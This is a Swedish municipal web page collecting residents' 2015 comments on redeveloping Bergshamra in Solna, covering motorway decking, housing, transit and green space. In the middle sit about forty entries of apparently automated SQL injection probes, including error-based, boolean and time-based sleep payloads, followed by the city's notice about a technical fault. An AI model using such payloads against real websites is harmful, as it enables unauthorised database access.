Bergshamra

Synpunkter:

Publicerat 12 maj 2015

Överdäcka hela bergshamra -leden. Bygg ut tvärbanan till bergshamra. Bygg radhus längs med björnstigen. Renovera bergdhammraskolan så den blir modern. Riv kontorshuset i bergshamra som är på klipporna ned mot brunnsviken och bygg bostäder där i stället.

Publicerat 13 maj 2015

Tycker mer skulle övertäckas när man ändå jobbar på det.

Publicerat 14 maj 2015

Bostäder för familjer är en nödvändighet för att Bergshamra skautvecklas. Idag mest studenter och pensionärer som inte har så stark köpkraft. Fokusera på att hitta yta att bygga radhus, flerbostadshus med merparten 5 rummare. Då kommer både närservice och skolan att utvecklas positivt. Många som får barn flyttar från Bergshamra för att det inte finns boendealternativ.

Publicerat 14 maj 2015

Däcka över HELA bergshamraleden så att vi knyter ihop norra och södra bergshamra + skapar mark för fler bostäder! Riv telia-huset på björnstigen, det fular ner hela området. Upptar värdefull mark och är allmänt störande (ser förfallet ut). Bygg fler bostäder där i stället, dvs längs björnstigen och på båda sidor (ta lite av skolans mark!). Bygg gångbro över till stocksund, tex från stocksundstorp, så att man slipper använda bullriga bilvägen när man man vill ta söndagspromenaden på andra sidan. Bygg även gångbro över ålkistan, av samma anledning. /Ulrika Olsson

Publicerat 14 maj 2015

Jag föreslår att vi ska bygga en eller två beachvolleybollplaner tillsammans med eller istället för lekplatsen i södra Bergshamra. När jag hör runt med folk som bor här vill de mycket hellre ha något för äldre barn och ungdomar och gärna något där barn och vuxna kan vara tillsammans. Även småbarnsfamiljerna framför denna åsikt. Beachvolleyboll attraherar lika mycket tjejer som killar. Kan spelas barn och vuxna ihop. Invandrare är ofta mycket duktiga på volleyboll eftersom det är en av världens största sporter. I Bergshamra bor många tjejer i åldrarna 10-18 som spelar volleyboll och skulle älska att ha en plan ute att samlas runt. Beachvolley är ett fantastiskt sätt att få tonårs tjejer att fortsätta idrotta. Tidigare fanns en beachvolleyplan vid parkleken i Bergshamra där vi brukade spela men den gjordes om till fotbollsplan utan att vi ens tillfrågades. Hög tid att ersätta den. 50% av kostnaden för att bygga en plan kan bekostas av Idrottslyftet. Jag är redan lovad pengar via Stockholms Idrottsförbund om vi ansöker i år. Vi i IFK Bergshamra volleyboll hjälper gärna till med planering och vet hur man anlägger en plan på bästa sätt. MVH Mirre Berg

Publicerat 16 maj 2015

Bygg hyresrätter. Bygg en stor mataffär som kan ersätta de två små. Fixa en direktbuss till solna centrum. Förbjud fiske vid bryggan vid tivoli. Fixa bullerskydd vid motorvägarna. Bygg ett kanotstall (vid vattnet). Där det går att låna/förvara kanoter.

Publicerat 16 maj 2015

Bind samman Bergshamra med resten av Solna genom att låta tvärbanan fortsätta dit. Det lär gå fortare än att dra tunnelbanan vidare från Arenastaden och man kan då även betjäna Haga Norra (nuv. Bilia-området), Frösunda, Ritorp/Ulriksdal innan man viker av mot Bergshamra. Tvärbanan kan sedan gå vidare via södra delen av Stocksundstorp och Ekhagen/Lappis till universitetet och vidare till Norra Djurgårdstaden och Ropsten.

Publicerat 16 maj 2015

Stocksundstorp är ett dåligt utnyttjat område. För en del år sedan fanns på Solnas webbsidor ett förslag om småskalig tilläggsbegygglelse som smälte väl in och skulle öka områdets attraktivitet. Ett smalt parktstråk på Roslagsbanans gamla banvall ledde ut till en utsiktspunkt vid det gamla brofästet. Ett bra läge för ett litet kafé. Vart tog detta förslag vägen?

Publicerat 16 maj 2015

Gör en tunnel ända från Järva Krog eller däcka över hela Bergshamraleden, att bara däcka över den östra delen finner jag inga belägg för. Kom igen nu!

Publicerat 16 maj 2015

Bergshamraskolan och skolgårdgen behöver renovering. Fler större lägenheter (4:or och 5:or). Överdäckning av mer än bara östra delen av E:18 skulle ha ett mycket bättre resultat. Beachvolleybollplan och andra saker för större barn skulle vara bra.

Publicerat 17 maj 2015

Jag tycker det förslag som presenterades i början av hösten var toppen! Bra att däcka över så mycket som möjligt av bergshamravägen och bygga lägenheter längs björnstigen och behålla grönområdena runt om. Gärna smalna av björnstigen för biltrafik men behålla/bredda cykelbanan. Bygg gångbro över ålkistan. Trängselskatt på bergshamravägen. Cykellift i Bergshamra backen!

Publicerat 18 maj 2015

1 gräv ner E18 och Norrtäljev Från Bergianska till Danderyd, Danderyd vill nog vara med och förlänga tunneln E18 från Bergianska till Järva krog, från Danderyd till Järva krog Inga köer, effektivare, miljövänligare Marken borde kunna inbringa miljardbelopp 2 i annat fall, däcka över bergshamraleden. Tyvärr kvarstår köerna och de kommer inte bli mindre. 3 gör Bergshamra energineutralt Signalistanropet kan börja med fastigheterna på torget när de ska stambyta 4 Bergshamra IP, fullstor friidrottsbana med sex banor runt

Publicerat 18 maj 2015

Bergshamras "svaga befolkningstillväxt" beror på att två vuxna flyttar dit, får barn och bor kvar så länge de kan. När de blivit 4, 5 (6?) i familjen blir det för trångt och de flyttar till Täby/Vallentuna/Danderyd. Ställ krav på att nybyggena som kommer med överdäckningen består av en majoritet av stora lägenheter. 4:or, 5:or och 6:or på minst 100 kvadrat. Bergshamra behöver inte fler smålägenheter, vi behöver behålla våra barnfamiljer!

Publicerat 19 maj 2015

Mer av Bergshamraleden behöver överdäckas och det finns utrymme för många bostäder, området runt centrum nu är nedgånget och utnyttjas ej trots läget.

Publicerat 19 maj 2015

Allt med naturen och boenden är jättefint i Bergshamra men det är katastrofalt att ta sig från Bergshamra med bil till Solna C för att t ex behöva gå till närakuten/BVC. En Tunnel E18-Bergshamra-Solna-Huvudsta-Bromma flygplats vore inte fel. Det är mycket bilkö på Bergshamraleden. Eller spårvagnsförlängring Solna C-Bergshamra. Tack

Publicerat 20 maj 2015

Förstår mig inte på denna förtätning.Varför måste vi förtäta områden,som redan är tätt bebyggda.vi bor ju inte i Hongkong,där jag kan ha en viss förståelse för det.Vi bor i ett av världens mest obebyggda länder,det finns gott om utrymme,för att bygga nya småstäder,exempelvis halv-vägs mot Uppsala,då kan man planera bra snabbförbindelser från början,exempelvis mot Stockholm.Man behöver inte packa ihop folk som sillar,när vi har så mycket obebyggda ytor att bygga på.Jag bor i Bergshamra,där man nu vill ta våra sista fria ytor.Tror inte folk här är beredda att byta ut våra fria ytor mot fler butiker och ett större befolkningsunderlag.Hälsn.Kalle

Publicerat 22 maj 2015

Överdäcka Bergshamraleden. Underhåll Bergshamra IP. Löparbanorna är i ett bedrövligt skick. Bygg radhus på t.ex. Björnstigen om ni vill få fler barnfamiljer till Bergshamra. Smalna gärna av Björnstigen och bredda trottoarer och cykelbanor. Idag funkar inte cykelbanan så bra där den passerar busshållplatser.

Publicerat 3 juni 2015

Otroligt bra med ett lyft för en viktig stadsdel. Med närhet till universitet är Bergshamra en naturlig plats för utveckling av bland annat forskarbostäder.

Publicerat 3 juni 2015

Skapa bättre belysning och bygg ihop förgårdsmark som präglar delar av Bergshamra (och även andra stadsdelar i Solna).

Publicerat 3 juni 2015

Jag tycker man ska överdäcka. Se till att förtäta lite nu så att den blir av. Vårt centrum måste vi alla ta mer ansvar för att handla i så nya butiker som kommer fram överlever i konkurrens med Mörby och andra centrum. Men med fler boende i Bergshamra blir det enklare. Sedan borde man göra det enklare att gå ner mot bockholmen. Är idag en ganska tråkig promenad?

Publicerat 3 juni 2015

Överdäcka bergshamraleden och förtäta!

Publicerat 6 juni 2015

Sluta förtäta i Bergshamra,med förtätning följer sämre luft,mer trafik,mer insyn i granhuset,svårare med parkeringsplatser,mindre antal träd och parker.Bygg gärna nytt,men inte i Bergshamra.

Publicerat 8 juni 2015

Vidta bullersänkande åtgärder. Inrätta ett kommunalt bad och fler bryggor längs Brunnsviken. Prioritera ny gång- cykelbro över Ålkistan, så att man slipper gå bland bilarna. Gör nationalstadsparkens närvaro tydligare genom bättre skyltning och underhåll. Inför offentliga toaletter vid Tivoli. Det behövs fler papperskorgar i hela Bergshamra. Ersätt kontorshuset vid Brunnsviken med bostäder.

Publicerat 9 juni 2015

Gygg och förtäta i linje med framtagen framtidsstrategi för Bergshamra.

Publicerat 9 juni 2015

Täck över leden så allt buller försvinner. Man kan knappt ha fönstret öppet dag som natt i om man bor i Centrum. Förläng tvärbanan. Och bygg en stor butik liknande Willys eller Ica maxi. Har man inte körkort är det tråkigt att inte kunna handla billigt.

Publicerat 12 juni 2015

Överdäcka Bergshamraleden. Från Roslagsvägen till västra delen av "DHL-huset" (Skogskarlen 2). Alla andra åtgärder i Bergshamra kan vänta om väl detta blir gjort.

Publicerat 13 juni 2015

Fler Familjebostäder behövs i Bergshamra för att öka möjligheten till bra närservice. Pensionärer och studenter spenderar mindre pengar och det märks i utbudet i livsmedelsaffärerna mfl. Önskar möjlighet att flytta till radhus med egen gräsplätt att odla på. Så fler Familjebostäder som oxå ger en bra grund för skolan.

Publicerat 16 juni 2015

Hur kommer det sig att Bergshamra koloniområde och Tivoli udde är borttagna från kartan och från kartbeskrivningen över "Sammanhängande kulturhistoriskt värdefull miljö" i nya Översiktsplan 2030? Dessa områden utgör alltså inte längre någon värdefull miljö om man får tro översiktsplanen. Är det medvetet eller ett fatalt misstag?

Publicerat 16 juni 2015

Hej. Jag ser gärna en spårförbindelse mellan Arenastaden och Bergshamra, för att på så vis binda ihop staden. Och jag föredrar en sådan förbindelse under jord. Lycka till Henrik

Publicerat 17 juni 2015

Hej! Jag tycker förslaget med upprustning av Bergshamra är bra. Men jag vänder mig starkt emot att en förtätning av lägenheter planeras alldeles för nära befintlig bebyggelse. Om gröna oaser försvinner så förstörs mycket av en bra boendemiljö. Naturen måste finnas nära våra bostäder. Det finns bättre markområden än att tränga ihop hus alldeles för tätt. Nuvarande boende i Bergshamra har valt Bergshamra och trivs här till stor del för den fina blandningen mellan hus och miljö. Ska vår boendemiljö försämras så att vi inte trivs här längre?

Publicerat 18 juni 2015

Bygg och förtäta. Så fort det ska göra något så gnälls det här, när det inte görs något så gnälls det här! Omöjlig stadsdel all göra något i verkar det som:( men vi är många som är glada över att torsget nu byggs om och att det ryktas om ett nytt café som ska öppna. Spännande att det händer något!

Publicerat 18 juni 2015

I det stora hela låter det bra, men jag gillar inte allt på de skisser jag har sett. Att bygga ett flervåningshus mellan Barks väg och Carl Malmstens skulle bara förvärra parkeringskaoset som redan råder i området.

Publicerat 18 juni 2015

En så kraftig förtättning av Bergshamra är inte av godo för oss som bor där. Trafik och ljud problemen skulle öka. Däremot skulle en överdäckning av Bergshamra leden skapa utrymme och ljuddämpning som motiverar en förtättning. Det skulle också på riktigt binda ihop norra och södra Bergshamra. En överdäckning motiverar även den förslagna förlängningen av tvär- eller tunnelbanan.

Publicerat 23 juni 2015

Förstör inte Bergshamra med förtätning.Det är bara att titta hur övriga Solna ser ut med trafikproblem och inga parkeringsplatser.Så tätt mellan husen att man ser vad grannarna gör.Förtätning,nej tack.

Publicerat 24 juni 2015

Däcka gärna över hela Bergshamraleden, förstår att det antagligen är för dyrt, men börja med överdäckning av en del (tex östra delen som föreslagits). Men förtäta INTE med en massa hus inklämda mellan befintliga hus!! Det måste finnas fler tomma platser där man kan bygga enstaka punkthus på olika ställen i Bergshamra, alternativt riva några fula kontorshus och byta ut till bostadshus istället. Vi som bor i Bergshamra gör det för att det är grönt och lummigt, jag vill inte ha insyn hos grannen 10 meter från mitt hus och hugg inte ned de träd som jag har utsikt över!

Publicerat 25 juni 2015

Bergshamra är Solnas mest välfungerande stadsdel. Värna om allt som är bra, och förändra varsamt. Några förslag till förbättring: 1. Lyft fram nationalstadsparken på ett tydligare vis. En konkret åtgärd är att öppna tredje tunnelbaneuppgång som vetter direkt mot Nationalstadsparken. "Profilera" Bergshamra tydligare som ett "nära-stan" utflyktsmål för människor som vill gå, fika, cykla, åka skridskor m.m. i ett vacker kultur- och naturlandskap. som råder (och som sannolikt kommer öka). Påskynda tillkomsten av gång/cykelbro över Ålkistan och skapa fler öppningar till Bergianska trädgården, så att man gångtrafikanter slipper trängas bland avgaserna från Norrtäljevägen och slipper dela utrymme med cykelpendlare. Detta skulle öka flödet av flanerande stadsbor, på promenad eller besök i Bergianska trädgården, avsevärt. 2. Låt biblioteket bli ett tydligare lokalt "fönster" mot kommunen. Givet att många Bergshamrabor inte känner sig särskilt mycket del av övriga Solna, skulle biblioteket kunna mera ha prägel av lokalt medborgarkontor, med information om ärenden som berör Bergshamra och mera inslag av medborgardialog. 3. Skilj cykelpendlare från gångtrafikanter i gång-cykelstråken i Bergshamra. Måste finnas ett tydligare barnperspektiv och ytor där barn inte riskerar att bli påkörda. Andrés Rivarola

Publicerat 29 juni 2015

Hej Solna! Jag hoppas verkligen att det finns en verklig strategi och inte minst en framtidsplan. Ni har uppenbarligen glömt att lägga ut dessa på hemsidan. Det ser ut som om ni skrivit dessa torftiga tankar EFTER samråd inte I samråd med de boende, dvs tutat innan överkörning./Göran

Publicerat 7 juli 2015

en badplats, kanske en strand/bryggpromenad med plats för både bänkar och badgäster. Bergshamra ligger omringa av vatten och det borde man utnyttja.

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' or (select 1 from (select count(*),concat((0x574352575653),0x5E,floor(rand(0)*2)) x from information_schema.tables group by x)a) or '

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR '

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586') oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR ('

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586" oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR "

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586") oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR ("

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586") oR updatexml(1,concat(0x5e,(0x574352575653)),0) oR ("

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' aNd (char(94)+(char(87)+char(67)+char(82)+char(87)+char(86)+char(83))+char(94))>0 and '9635'='9635

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' aNd 7809973=7809973 aNd '6199'='6199

Publicerat 24 juli 2015

99999999' oR 8736588=8736588 aNd '6199'='6199

Publicerat 24 juli 2015

99999999' oR 6251696=6251696--

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586') aNd 2047231=2047231 aNd ('6199')=('6199

Publicerat 24 juli 2015

99999999') oR 7480761=7480761 aNd ('6199')=('6199

Publicerat 24 juli 2015

99999999') oR 6892536=6892536--

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586" aNd 5187798=5187798 aNd "6199"="6199

Publicerat 24 juli 2015

99999999" oR 2861846=2861846 aNd "6199"="6199

Publicerat 24 juli 2015

99999999" oR 6934926=6934926--

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586") aNd 1984852=1984852 aNd ("6199")=("6199

Publicerat 24 juli 2015

99999999") oR 1687272=1687272 aNd ("6199")=("6199

Publicerat 24 juli 2015

99999999") oR 3265648=3265648--

Publicerat 24 juli 2015

' oR 2678048=2678048 aNd '%'='

Publicerat 24 juli 2015

" oR 9228002=9228002 aNd "%"="

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' RLIKE (case when 2313442=2313442 then 0x74657374696E70757476616C7565 else 0x28 end) and '7917'='7917

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' RLIKE (case when 7338716=7338716 then 0x74657374696E70757476616C7565 else 0x28 end) and '%'='

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586 aNd if(length(0x574352575653)>1,sleep(3),0)

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586 aNd if(length(0x574352575653)<1,sleep(3),0)

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586 oR if(length(0x574352575653)>1,sleep(3),0)

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586 oR if(length(0x574352575653)<1,sleep(3),0)

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' aNd if(length(0x574352575653)>1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' aNd if(length(0x574352575653)<1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' oR if(length(0x574352575653)>1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586' oR if(length(0x574352575653)<1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586') aNd if(length(0x574352575653)>1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586') aNd if(length(0x574352575653)<1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586') oR if(length(0x574352575653)>1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586') oR if(length(0x574352575653)<1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586" aNd if(length(0x574352575653)>1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586" aNd if(length(0x574352575653)<1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586" oR if(length(0x574352575653)>1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586" oR if(length(0x574352575653)<1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586") aNd if(length(0x574352575653)>1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586") aNd if(length(0x574352575653)<1,sleep(3),0) --

Publicerat 24 juli 2015

WCRTEXTAREATESTINPUT8746586") oR if(length(0x574352575653)>1,sleep(3),0) --

Publicerat 30 juli 2015

Sedan 24 juli finns bara nonsens att läsa på denna sida. Något "troll" har varit aktivt. Skickar detta för att se om det är åtgärdat. Ta gärna bort de meningslösa synpunkterna! Tack.

Publicerat 3 augusti 2015

Hej! Ett tekniskt fel har uppstått på den här sidan när det gäller möjligheten att lämna synpunkter. Det är felanmält till stadens IT-entreprenör för åtgärd. Hoppas att funktionen ska vara igång så snart som möjligt igen. Solna stad

Publicerat 3 augusti 2015

Hej! Nu fungerar det att lämna synpunkter på denna sida igen. De felaktiga inläggen ovan kommer att tas bort så snart som möjligt. Tack för att ni tycker till om hur Solna ska ut i framtiden! Solna stad

Publicerat 4 augusti 2015

Bergshamra är ett fantastiskt område! Ett tättbebyggt område i närheten av city som har mycket grönska och en fin blandning mellan grönområden och bebyggelse. Vi som bor här störs av buller från Bergshamraleden – därför är förslaget om övertäckning mycket bra! Centrum är slitet – därför är förslaget om upprustning av centrum mycket bra! Vi trivs i en miljö med grönområden bland bebyggelse- därför tycker jag att förslaget om förtätning av bebyggelsen i vissa områden är mycket negativt. Det finns bättre platser att bygga bostadshus på än endast några meter från befintlig bebyggelse. Detta blir mycket negativt för de som redan bor här och även de som ska flytta in i ett hus där man ser rakt in i nästa hus. Ny bebyggelse nära befintlig innebär att grönområden försvinner vilket är mycket negativt. Det område jag närmast tänker på är mellan Barks väg och Carl Malmstens väg, men generellt gäller överallt att bostadshus inte ska ligga för tätt – både med hänsyn till boende och till naturen! Det skapar även stora parkeringsproblem, något som vi redan tyvärr har. Så välj områden för ny bebyggelse som leder till att både nuvarande och blivande befolkning kommer att trivas i Berghamra

Publicerat 7 augusti 2015

Hej, jag tycker att promenad/cykelstråken behöver uppdateras/förnyas och bli säkrare har hänt att cyklister är på väg att krocka med fotgängare och framförallt barn. Bergshamraskolan måste förbättras och moderniseras. Bättre kommunikationer och grönområden som sköts bättre. Fräschare återvinningstationer. Däremot tycker jag att det är oerhört viktig att behålla träden och naturen. Alla grönområden uppskattas oerhört mycket av oss invånare och det är den frästa anledningen till att man väljer att bo i och besöka Bergshamra, då syftar jag även på den norra delen. De gröna områdena är inte bara bra för vårt ekosystem, men också ur sociala aspekt. Framförallt för barn och äldre, de får möjlighet att mötas och det är ett fint utbyte, eleverna på skolan/förskolor eller som bor i området uppmanas till spontan lek på stora gönområdena runtomkring (framförallt vid parken innan torget). Det är väldigt viktigt att Bergshamra fortsätter vara ett lugnt område där barn kan springa fritt utanför sina hem och inte störas av farlig trafik, bygg och buller. En total överdäckning vore det ultimata, det skulle koppla ihop hela Bergshamra som alla önskar, få bort buller och miljögifter, ge plats för många nya bostäder och samtidigt bevara de gröna ytorna. Detta är en bättre lösning långsiktigt för det kommer behöva göra någon gång ändå. Parkeringar bör byggas under mark! Fler förskolor behövs framförallt om fler ska bo här och äldreboende. Ska fler bostäder byggas bör de ta hänsyn till att inte bygga för tätt som de gör i övriga Solna, dels pga ljusinsläpp men också för att man förlorar syftet med Bergshamra = "grönt & mycket natur". En bättre badplats där yngre barn kan bada vid Brunnsviken vore också toppen. Just nu finns det bara bryggor. En ordentlig basketplan med mjukt underlag saknar många vet jag. Hoppas verkligen att ni ser till att bevara de gröna ytor vi har idag på båda sidor och väljer att däcka över större delar av leden istället. Tack!

Publicerat 8 augusti 2015

Jättebra!

Publicerat 11 augusti 2015

Superbra att det satsas på biblioteket med ökade öppettider! Ett bageri och fler restauranger vore önskvärt för att skapa en trevligare närmiljö.

Publicerat 18 augusti 2015

Hej, jag tycker Bergshamras strand mot Stocksundet är en oslipad diamant. Där kraftledningen ska mark/sjöförläggas har det nu skapats en smal öppning mellan ängen ovanför och vattnet. Där trivs folk, fikar och fiskar. Bredda den en smula så ängen möter vattnet! Strandpromenaden som forsätter mot Ulriksdal är undermålig, den borde ha en standard som åtminstone klarar en barnvagn. Ett fantastiskt stråk som tyvärr är svårutnyttjat. Där Stocksundet är som smalast mellan denna gångväg (strax sydöst om "Svalkan") skulle det vara helt underbart med en gångbro som knyter ihop skogen/ängen/Mörby Centrum med Bergshamra. Där är smalt och grunt, dvs lättbyggt, eventuellt kan denna förbindelse ha en roll i den regionala cykelplanen också. Höjden bör mht båtar ligga i nivå med Roslagsbanebron dvs 8 meter, eller möjligen den gamla Roslagsbanebron - det är ingen mänsklig rättighet att ha båt som är mer än säg 6 meter hög i Edsviken, finns då båtplatser längre ut, segelbåtar är ju i princip redan uteslutna i viken. med vänliga hälsningar Jan Lindqvist, flygperspektiv@gmail.com

Publicerat 18 augusti 2015

Bygg inte sönder Bergshamra som man giort på många andra ställe,det är en investering inför framtiden.Mr.X

Publicerat 27 augusti 2015

Idéerna kring att utveckla Bergshamra med fler bostäder som presenterats i den där strategin eller idéprogrammet är positivt. Ser gärna mer förtäning och genom det en uppfräschning av delarna som släpar lite i dag.

Publicerat 27 augusti 2015

Fler bostäder och gärna tvärbanan hit till Bergshamra. Gör så att fler flyttar hit och lockar hit bättre närservice!

Publicerat 27 augusti 2015

Om vi skulle få tvärbanan hit skulle Bergshamra få ett rejält lyft. Det som sagts kring att delvis överdäcka bergshamraleden låter mycket bra. Mer sådant!

Publicerat 27 augusti 2015

Bättre belysning och mer liv och rörelse skulle lyfta Bergshamra. Bygg fler bostadshus!

Publicerat 27 augusti 2015

Ökat byggande av större lägenheter och radhus kommer kunna göra Bergshamra till en av de absolut bästa stadsdelarna i Solna med närhet till både natur, vatten och city.

Publicerat 27 augusti 2015

Om man skulle kunna bygga bostäder vid vattnet skulle fler kunna njuta av våra fina vattennära områden (på de ställen som i dag är mer otillgängliga men som ligger sjönära).

Publicerat 27 augusti 2015

Det behövs fler lägenheter. Berghamra känns idag rätt sunkigt. Fräscha upp området så det blir lite mer stadsmässigt. Förtäta så det känns tryggt att promenera under dygnets alla timmar. idag är det för mycket skog och naturområden. Bygg längs vattnet.

Publicerat 29 augusti 2015

Med 176/177 tar man sig snabbt till Solna C. Men för oss rullatorberoende tar det mkt tid o kraft att ta sig upp över If-bron och ner till håll-platsen. Vi måste ta T-bana till Danderyds sjukhus och byta där till 176/77. Då är ju tidsvinsten borta. Hoppas på en överdäckning. Då blir det säkert hiss till/från Bergshamra bro Hållplats.

Publicerat 29 augusti 2015

Dra tvärbanan vidare över spårvägsbron till Mörby hållplats, så kan 176/77 utgå från Solna station

Publicerat 29 augusti 2015

Bra att parken i Södra Bergshamra rustas upp. Öppna inte Bergshamra allé för genomfartstrafik. Då försvinner tryggheten. Det är mer än nog med cyklisterna. Behåll de gröna stråk som finns för barn att nå parken öster och västerifrån. Norrifrån bör ett utbyggt grönstråk följa från ljussignalen vid cykelbron och längs med den smala grönytan med ekarna mellan Barks väg och Carl Malmstens väg.

Publicerat 29 augusti 2015

Däcka över hela. Det frigör yta för att bygga ovanpå Men en del av överdäckningen bör planeras som vilt-övergång med natur, buskar och träd, så att rådjur, grävlingar etc kan söka sig över utan att riskera livet. bäst vore det om det blir i höjd med OK där de brukar gå ner mot Brunnsviken. Förbi OK behöver nog vägbanan sänkas innan så att det blir bra.

Publicerat 31 augusti 2015

I Bergshamra har vi ett bra serviceutbud med flera mataffärer, restauranger och pizzerior. Vi har dessutom ett bibliotek, vårdcentral, apotek, privatdoktor, tandläkare, fotvård, kemtvätt, dam och herrfrisör, blomsteraffär,skönhetsvård, cykelaffär och ett Gym 24 tim/dygn. Med T-banan har vi 4 min till Mörby centrum och 6 min till Odengatan och Vasastan. Vi har ett fantastiskt fint grönområde men omgiven av stora trafikleder. Att förtäta Bergshamra med ca 1 300 bostäder och nya kontorshus leder till mer bilar. Förslaget med en stadsgata, Bergshamragatan mitt i ett promenadvänligt område gör att det blir mer störande trafik för de boende. En förtätad förort blir aldrig en charmig innerstad så förtätning bör ske varsamt. Vi har många kontorshus som kanske skulle kunna göras om till bostäder? Ingrid

Publicerat 31 augusti 2015

Planera för radhus i Bergshamra.

Dela: